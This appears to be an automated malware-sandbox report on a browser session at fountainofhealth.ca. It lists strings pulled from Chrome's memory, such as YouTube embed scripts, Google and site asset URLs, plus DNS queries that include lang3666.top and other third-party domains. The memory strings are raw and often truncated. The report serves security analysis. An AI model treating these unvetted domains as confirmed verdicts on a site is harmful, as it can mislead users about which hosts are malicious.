Source: chrome.exe, 00000000.00000002.2442196186.000001E4AF687000.00000004.08000000.00040000.00000007.sdmp String found in binary or memory: {"action":"getScript","source":"window.yterr=window.yterr||true;window.unhandledErrorMessages={};\nwindow.onerror=function(msg,url,line,opt_columnNumber,opt_error){var err;if(opt_error)err=opt_error;else{err=new Error;err.message=msg;err.fileName=url;err.lineNumber=line;if(!isNaN(opt_columnNumber))err[\"columnNumber\"]=opt_columnNumber}var message=String(err.message);if(!err.message||message in window.unhandledErrorMessages)return;window.unhandledErrorMessages[message]=true;var img=new Image;window.emergencyTimeoutImg=img;img.onload=img.onerror=function(){delete window.emergencyTimeoutImg};var values=\n{\"client.name\":ytcfg.get(\"INNERTUBE_CONTEXT_CLIENT_NAME\"),\"client.version\":ytcfg.get(\"INNERTUBE_CONTEXT_CLIENT_VERSION\"),\"msg\":message,\"type\":\"UnhandledWindow\"+err.name,\"file\":err.fileName,\"line\":err.lineNumber,\"stack\":(err.stack||\"\").substr(0,500)};var parts=[ytcfg.get(\"EMERGENCY_BASE_URL\",\"/error_204?t=jserror&level=ERROR\")];var key;for(key in values){var value=values[key];if(value)parts.push(key+\"=\"+encodeURIComponent(value))}img.src=parts.join(\"&\")};\n","currentUrl":"https://www.youtube.com/embed/gobWGqPjLSQ?si=E-htCYBt9m3YW0ws","inline":true,"dynamic":false} equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000002.2442196186.000001E4AF687000.00000004.08000000.00040000.00000007.sdmp String found in binary or memory: {"action":"getScript","source":"window.yterr=window.yterr||true;window.unhandledErrorMessages={};\nwindow.onerror=function(msg,url,line,opt_columnNumber,opt_error){var err;if(opt_error)err=opt_error;else{err=new Error;err.message=msg;err.fileName=url;err.lineNumber=line;if(!isNaN(opt_columnNumber))err[\"columnNumber\"]=opt_columnNumber}var message=String(err.message);if(!err.message||message in window.unhandledErrorMessages)return;window.unhandledErrorMessages[message]=true;var img=new Image;window.emergencyTimeoutImg=img;img.onload=img.onerror=function(){delete window.emergencyTimeoutImg};var values=\n{\"client.name\":ytcfg.get(\"INNERTUBE_CONTEXT_CLIENT_NAME\"),\"client.version\":ytcfg.get(\"INNERTUBE_CONTEXT_CLIENT_VERSION\"),\"msg\":message,\"type\":\"UnhandledWindow\"+err.name,\"file\":err.fileName,\"line\":err.lineNumber,\"stack\":(err.stack||\"\").substr(0,500)};var parts=[ytcfg.get(\"EMERGENCY_BASE_URL\",\"/error_204?t=jserror&level=ERROR\")];var key;for(key in values){var value=values[key];if(value)parts.push(key+\"=\"+encodeURIComponent(value))}img.src=parts.join(\"&\")};\n","currentUrl":"https://www.youtube.com/embed/gobWGqPjLSQ?si=E-htCYBt9m3YW0ws","inline":true,"dynamic":false}application/json equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000002.2442196186.000001E4AF687000.00000004.08000000.00040000.00000007.sdmp, chrome.exe, 00000000.00000002.2485699742.000028EC0384C000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2353212423.000028EC07C9C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: {"action":"getScript","source":"writeEmbed();","currentUrl":"https://www.youtube.com/embed/FURi5aHgp1g?si=Y2rCuE23jf8bkHaX","inline":true,"dynamic":false} equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000002.2442196186.000001E4AF687000.00000004.08000000.00040000.00000007.sdmp String found in binary or memory: {"action":"getScript","source":"writeEmbed();","currentUrl":"https://www.youtube.com/embed/FURi5aHgp1g?si=Y2rCuE23jf8bkHaX","inline":true,"dynamic":false}D equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000002.2442196186.000001E4AF687000.00000004.08000000.00040000.00000007.sdmp String found in binary or memory: {"action":"getScript","source":"writeEmbed();","currentUrl":"https://www.youtube.com/embed/gobWGqPjLSQ?si=E-htCYBt9m3YW0ws","inline":true,"dynamic":false} equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000002.2477429198.000028EC02F50000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2479146815.000028EC031B7000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2497133078.000028EC04B64000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: {"action":"getScript","source":"writeEmbed();","currentUrl":"https://www.youtube.com/embed/h15NcT6UXh0?si=YrXkudamh5IoggTR","inline":true,"dynamic":false} equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000002.2479146815.000028EC031B7000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: {"action":"getScript","source":"writeEmbed();","currentUrl":"https://www.youtube.com/embed/h15NcT6UXh0?si=YrXkudamh5IoggTR","inline":true,"dynamic":false}"} equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000002.2497133078.000028EC04B64000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: {"action":"getScript","source":"writeEmbed();","currentUrl":"https://www.youtube.com/embed/h15NcT6UXh0?si=YrXkudamh5IoggTR","inline":true,"dynamic":false}:false} equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000002.2442196186.000001E4AF687000.00000004.08000000.00040000.00000007.sdmp String found in binary or memory: {"action":"getTabUrl"}ource":"var yterr = yterr || true;","currentUrl":"https://www.youtube.com/embed/h15NcT6UXh0?si=YrXkudamh5IoggTR","inline":true,"dynamic":false}iM equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000002.2490662725.000028EC03FB4000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: |https://www.youtube.com/embed/h15NcT6UXh0?si=YrXkudamh5IoggTRator equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000002.2496441867.000028EC04960000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: || 'undte Array.prototype.entries;}","currentUrl":"https://www.youtube.com/embed/FURi5aHgp1g?si=Y2rCuE23jf8bkHaX","inline":true,"dynamic":false} equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000002.2479725878.000028EC03244000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2496441867.000028EC04960000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: || 'undte Array.prototype.entries;}","currentUrl":"https://www.youtube.com/embed/FURi5aHgp1g?si=Y2rCuE23jf8bkHaX","inline":true,"dynamic":false}ne":true,"dynamic":fale} equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000002.2495185106.000028EC047AC000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: || 'undte Array.prototype.entries;}","currentUrl":"https://www.youtube.com/embed/gobWGqPjLSQ?si=E-htCYBt9m3YW0ws","inline":true,"dynamic":false} equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000002.2488392167.000028EC03CA0000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: || 'undte Array.prototype.entries;}","currentUrl":"https://www.youtube.com/embed/gobWGqPjLSQ?si=E-htCYBt9m3YW0ws","inline":true,"dynamic":true} equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000002.2479725878.000028EC03244000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: || 'undte Array.prototype.entries;}","currentUrl":"https://www.youtube.com/embed/h15NcT6UXh0?si=YrXkudamh5IoggTR","inline":true,"dynamic":false} B equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000002.2495865997.000028EC04894000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: || 'undte Array.prototype.entries;}","currentUrl":"https://www.youtube.com/embed/h15NcT6UXh0?si=YrXkudamh5IoggTR","inline":true,"dynamic":false} equals www.youtube.com (Youtube)
Source: global traffic DNS traffic detected: DNS query: fountainofhealth.ca
Source: global traffic DNS traffic detected: DNS query: cdn.jsdelivr.net
Source: global traffic DNS traffic detected: DNS query: islonline.org
Source: global traffic DNS traffic detected: DNS query: lang3666.top
Source: global traffic DNS traffic detected: DNS query: www.google.com
Source: global traffic DNS traffic detected: DNS query: www.youtube.com
Source: global traffic DNS traffic detected: DNS query: i.ytimg.com
Source: global traffic DNS traffic detected: DNS query: googleads.g.doubleclick.net
Source: global traffic DNS traffic detected: DNS query: static.doubleclick.net
Source: global traffic DNS traffic detected: DNS query: yt3.ggpht.com
Source: global traffic DNS traffic detected: DNS query: play.google.com
Source: global traffic DNS traffic detected: DNS query: beacons.gcp.gvt2.com
Source: global traffic DNS traffic detected: DNS query: windomstatetheater.com
Source: global traffic DNS traffic detected: DNS query: beacons.gvt2.com
Source: global traffic DNS traffic detected: DNS query: beacons2.gvt2.com
Source: global traffic DNS traffic detected: DNS query: beacons3.gvt2.com
Source: global traffic DNS traffic detected: DNS query: beacons4.gvt2.com
Source: chrome.exe, 00000000.00000002.2481950611.000028EC033E0000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2437824544.000001E4AB3AD000.00000004.00000001.00040000.00000007.sdmp, chrome.exe, 00000000.00000002.2503938588.000028EC0782C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2482084974.000028EC03404000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://csp.withgoogle.com/csp/report-to/scaffolding/ascnsrsggc:99:0
Source: chrome.exe, 00000000.00000002.2481950611.000028EC033E0000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2437824544.000001E4AB3AD000.00000004.00000001.00040000.00000007.sdmp, chrome.exe, 00000000.00000002.2503938588.000028EC0782C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2439458597.000001E4ACC5D000.00000004.00000001.00040000.00000007.sdmp String found in binary or memory: https://csp.withgoogle.com/csp/scaffolding/ascnsrsggc:99:0
Source: chrome.exe, 00000000.00000002.2481950611.000028EC033E0000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2437824544.000001E4AB3AD000.00000004.00000001.00040000.00000007.sdmp, chrome.exe, 00000000.00000002.2503938588.000028EC0782C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://csp.withgoogle.com/csp/scaffolding/ascnsrsggc:99:0cross-origin-opener-policy-report-only:sam
Source: chrome.exe, 00000000.00000002.2479493141.000028EC03214000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://dailymotion.com
Source: chrome.exe, 00000000.00000002.2476477758.000028EC02E04000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://dl.google.com/release2/chrome_component/acdvcifl2ztime6bsz3eijtcfeaq_2025.5.15.1/kiabhabjdbk
Source: chrome.exe, 00000000.00000002.2476477758.000028EC02E04000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://dl.google.com/release2/chrome_component/acwmiglbaq6quecjufmamfsqupsa_2025.5.21.0/niikhdgajlp
Source: chrome.exe, 00000000.00000002.2476477758.000028EC02E04000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://dl.google.com/release2/chrome_component/adrga7eefaxjfdmmgfkiaxjg4yjq_2024.7.12.235938/eeigpn
Source: chrome.exe, 00000000.00000002.2476477758.000028EC02E04000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://dl.google.com/release2/chrome_component/l4z3clyi7urxnsu2inhaenyzam_2025.5.20.1303/ggkkehgbnf
Source: chrome.exe, 00000000.00000002.2476477758.000028EC02E04000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://dl.google.com/release2/chrome_component/lnu3li27zsanbe2hcsfjuvm5fq_1.0.7.1744928549/laoigpbl
Source: chrome.exe, 00000000.00000002.2474881324.000028EC02C04000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/document/:
Source: chrome.exe, 00000000.00000002.2474881324.000028EC02C04000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2478462011.000028EC03084000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2483278146.000028EC035BC000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2482574043.000028EC03494000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/document/?usp=installed_webapp
Source: chrome.exe, 00000000.00000002.2474881324.000028EC02C04000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/document/J
Source: chrome.exe, 00000000.00000002.2474881324.000028EC02C04000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2485928305.000028EC0389C000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2482360375.000028EC03454000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2480220469.000028EC032B4000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/document/installwebapp?usp=chrome_default
Source: chrome.exe, 00000000.00000002.2485928305.000028EC0389C000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2480220469.000028EC032B4000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/document/installwebapp?usp=chrome_defaultult
Source: chrome.exe, 00000000.00000002.2488945594.000028EC03E04000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2475912071.000028EC02D68000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2477145789.000028EC02F04000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/document/u/0/create?usp=chrome_actions
Source: chrome.exe, 00000000.00000002.2474881324.000028EC02C04000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/presentation/:
Source: chrome.exe, 00000000.00000002.2474881324.000028EC02C04000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2479649232.000028EC03230000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2482360375.000028EC03454000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2480220469.000028EC032B4000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/presentation/?usp=installed_webapp
Source: chrome.exe, 00000000.00000002.2474881324.000028EC02C04000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/presentation/J
Source: chrome.exe, 00000000.00000002.2474881324.000028EC02C04000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2482360375.000028EC03454000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2480220469.000028EC032B4000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2469526072.000028EC02404000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2487008035.000028EC03A6C000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/presentation/installwebapp?usp=chrome_default
Source: chrome.exe, 00000000.00000002.2474881324.000028EC02C04000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/spreadsheets/:
Source: chrome.exe, 00000000.00000002.2474881324.000028EC02C04000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2479649232.000028EC03230000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2482360375.000028EC03454000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/spreadsheets/?usp=installed_webapp
Source: chrome.exe, 00000000.00000002.2474881324.000028EC02C04000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/spreadsheets/J
Source: chrome.exe, 00000000.00000002.2474881324.000028EC02C04000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2482360375.000028EC03454000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2487008035.000028EC03A6C000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/spreadsheets/installwebapp?usp=chrome_default
Source: chrome.exe, 00000000.00000002.2474881324.000028EC02C04000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://drive.google.com/:
Source: chrome.exe, 00000000.00000002.2474881324.000028EC02C04000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2483628964.000028EC03604000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2478884208.000028EC03140000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2477677350.000028EC02FE4000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2483278146.000028EC035BC000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://drive.google.com/?lfhs=2
Source: chrome.exe, 00000000.00000002.2474881324.000028EC02C04000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://drive.google.com/J
Source: chrome.exe, 00000000.00000002.2474881324.000028EC02C04000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2477822635.000028EC03004000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2482360375.000028EC03454000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2480220469.000028EC032B4000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://drive.google.com/drive/installwebapp?usp=chrome_default
Source: chrome.exe, 00000000.00000002.2476477758.000028EC02E04000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaldksiunzh56452py2db5mnbpa_120.0.6050.
Source: chrome.exe, 00000000.00000002.2476477758.000028EC02E04000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acdvcifl2ztime6bsz3eijtcfeaq_2025.5.15.1
Source: chrome.exe, 00000000.00000002.2476477758.000028EC02E04000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acgzb5szf7x3so2hvkfx32p7bbuq_9805/hfnkpi
Source: chrome.exe, 00000000.00000002.2476477758.000028EC02E04000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acwmiglbaq6quecjufmamfsqupsa_2025.5.21.0
Source: chrome.exe, 00000000.00000002.2476477758.000028EC02E04000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://edgedl.me.gvt1.com/edgedl/release2/chrome_component/aevtvjsxpcrwhjvp5w32fej6zq_9.56.0/gcmjkm
Source: chrome.exe, 00000000.00000002.2476477758.000028EC02E04000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://edgedl.me.gvt1.com/edgedl/release2/chrome_component/imoffpf67hel7kbknqflao2oo4_1.0.2738.0/ne
Source: chrome.exe, 00000000.00000002.2476477758.000028EC02E04000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://edgedl.me.gvt1.com/edgedl/release2/chrome_component/l7xtcygg3vebugalfkm3b3dp3u_6.7431.9692/p
Source: chrome.exe, 00000000.00000002.2479493141.000028EC03214000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://eloan.co.jp
Source: chrome.exe, 00000000.00000002.2479493141.000028EC03214000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://explorefledge.com
Source: chrome.exe, 00000000.00000002.2481950611.000028EC033E0000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2438376642.000001E4AC843000.00000002.00000001.00040000.00000018.sdmp, chrome.exe, 00000000.00000002.2437824544.000001E4AB3AD000.00000004.00000001.00040000.00000007.sdmp, chrome.exe, 00000000.00000002.2470328399.000028EC025B4000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2477907567.000028EC03017000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2477429198.000028EC02F50000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2341068096.000028EC06B20000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2503938588.000028EC0782C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2487287792.000028EC03B44000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2313183913.000028EC04904000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2486226544.000028EC03934000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2500594658.000028EC06708000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2494077088.000028EC04569000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2484247572.000028EC036C8000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2504920631.000028EC07968000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2489590171.000028EC03E8C000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://fountainofhealth.ca
Source: chrome.exe, 00000000.00000002.2471255420.000028EC02708000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2385420147.000028EC07EBC000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2489230157.000028EC03E54000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2496006842.000028EC048C0000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2488595121.000028EC03D04000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2378554126.000028EC08108000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2496387557.000028EC04944000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2496495802.000028EC04980000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2496237915.000028EC0490C000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2499890214.000028EC06438000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2495089287.000028EC04770000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2400889050.000028EC0505C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2495529652.000028EC04804000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2378591472.000028EC06404000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2504142825.000028EC07868000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2319699836.000028EC0490C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2485039398.000028EC03794000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2501436245.000028EC06920000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2492640929.000028EC04120000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 
00000000.00000002.2438376642.000001E4AC843000.00000002.00000001.00040000.00000018.sdmp, chrome.exe, 00000000.00000003.2377731474.000028EC06D48000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://fountainofhealth.ca/
Source: chrome.exe, 00000000.00000002.2489230157.000028EC03E54000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2492640929.000028EC04120000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2481401055.000028EC0337C000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://fountainofhealth.ca//
Source: chrome.exe, 00000000.00000002.2492877168.000028EC0414C000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2361293065.000028EC067ED000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2488595121.000028EC03D04000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2352813519.000028EC04A4D000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2400354743.000028EC04A4D000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2400561655.000028EC06D49000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2314538909.000028EC0284C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2313656839.000028EC04264000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://fountainofhealth.ca/5-minute-cbt-course
Source: chrome.exe, 00000000.00000002.2489880900.000028EC03EE0000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://fountainofhealth.ca/7
Source: chrome.exe, 00000000.00000002.2487549813.000028EC03B90000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://fountainofhealth.ca/Home
Source: chrome.exe, 00000000.00000002.2499837074.000028EC06424000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://fountainofhealth.ca/LnB1c2goVil9fSk=
Source: chrome.exe, 00000000.00000002.2490296198.000028EC03F64000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://fountainofhealth.ca/X
Source: chrome.exe, 00000000.00000003.2319699836.000028EC04912000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2385420147.000028EC07EBC000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2496237915.000028EC0490C000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2494505049.000028EC04592000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2377731474.000028EC06D48000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2314538909.000028EC0284C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2313656839.000028EC04264000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://fountainofhealth.ca/about-us#about-foh-learning-center
Source: chrome.exe, 00000000.00000003.2319699836.000028EC04912000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2496237915.000028EC0490C000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://fountainofhealth.ca/about-us#about-foh-learning-centererdler
Source: chrome.exe, 00000000.00000002.2501264021.000028EC068D4000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2501144025.000028EC06888000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2504302862.000028EC078A4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2314538909.000028EC0284C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2313656839.000028EC04264000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://fountainofhealth.ca/clinicians
Source: chrome.exe, 00000000.00000002.2488053854.000028EC03C4C000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://fountainofhealth.ca/core/assets/vendor/jquery.ui/themes/base/button.css?swjs7b
Source: chrome.exe, 00000000.00000002.2500543178.000028EC066F4000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://fountainofhealth.ca/core/assets/vendor/jquery.ui/themes/base/dialog.css?swjs7b
Source: chrome.exe, 00000000.00000002.2470544813.000028EC02604000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2492115334.000028EC040C0000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2320114784.000028EC0663C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://fountainofhealth.ca/core/assets/vendor/jquery.ui/ui/data-min.js?v=10.1.0
Source: chrome.exe, 00000000.00000002.2470544813.000028EC02604000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2473488281.000028EC02A6C000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2320114784.000028EC0663C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://fountainofhealth.ca/core/assets/vendor/jquery.ui/ui/disable-selection-min.js?v=10.1.0
Source: chrome.exe, 00000000.00000002.2475705022.000028EC02CD0000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2481637546.000028EC033B0000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2320146432.000028EC06700000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://fountainofhealth.ca/core/assets/vendor/jquery.ui/ui/form-reset-mixin-min.js?v=10.1.0
Source: chrome.exe, 00000000.00000002.2475705022.000028EC02CD0000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://fountainofhealth.ca/core/assets/vendor/jquery.ui/ui/form-reset-mixin-min.js?v=10.1.0/
Source: chrome.exe, 00000000.00000002.2488053854.000028EC03C4C000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2320146432.000028EC06700000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://fountainofhealth.ca/core/assets/vendor/jquery.ui/ui/labels-min.js?v=10.1.0
Source: chrome.exe, 00000000.00000002.2470544813.000028EC02604000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://fountainofhealth.ca/core/assets/vendor/jquery.ui/ui/version-min.js?v=10.1.0
Source: chrome.exe, 00000000.00000002.2495089287.000028EC04770000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2492115334.000028EC040C0000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2490153719.000028EC03F40000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2320146432.000028EC06700000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://fountainofhealth.ca/core/assets/vendor/jquery.ui/ui/widget-min.js?v=10.1.0
